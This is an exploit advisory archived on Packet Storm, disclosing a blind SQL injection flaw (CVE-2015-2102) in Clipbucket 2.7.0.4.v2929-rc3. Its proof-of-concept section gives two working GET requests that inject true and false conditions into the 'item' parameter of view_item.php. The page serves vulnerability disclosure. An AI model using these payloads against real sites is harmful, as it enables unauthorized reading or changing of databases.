what you don't know can hurt you

Clipbucket 2.7.0.4.v2929-rc3 Blind SQL Injection

Clipbucket 2.7.0.4.v2929-rc3 Blind SQL Injection
Posted Feb 20, 2015
Authored by CWH Underground

Clipbucket version 2.7.0.4.v2929-rc3 suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2015-2102
MD5 | 6b240f808b67fc620a9be7f1c3b24a73

Clipbucket 2.7.0.4.v2929-rc3 Blind SQL Injection

Change Mirror Download
# Exploit Title   : Clipbucket 2.7 RC3 0.9 Blind SQL Injection
# Date : 20 February 2015
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://clip-bucket.com/
# Software Link : http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/clipbucket-2.7.0.4.v2929-rc3.zip
# Version : 2.7.0.4.v2929-rc3
# Tested on : Window and Linux

,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'

####################
SOFTWARE DESCRIPTION
####################

ClipBucket is an OpenSource Multimedia Management Script Provided Free to the Community.This script comes with all
the bells & whistles required to start your own Video Sharing website like Youtube, Metacafe, Veoh, Hulu or any
other top video distribution application in matter of minutes. ClipBucket is fastest growing script which was
first started as Youtube Clone but now its advance features & enhancements makes it the most versatile, reliable &
scalable media distribution platform with latest social networking features, while staying light on your pockets.
Whether you are a small fan club or a big Multi Tier Network operator, Clipbucket will fulfill your video
management needs.

##################################
VULNERABILITY: Blind SQL Injection
##################################

An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
depending on the query, DBMS and configuration.

= POC =
GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27a&type=photos&collection=9 => True Condition
GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27b&type=photos&collection=9 => False Condition (Item does not exist.)

################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    16 Files
  • 23
    Jan 23rd
    1 Files
  • 24
    Jan 24th
    1 Files
  • 25
    Jan 25th
    36 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close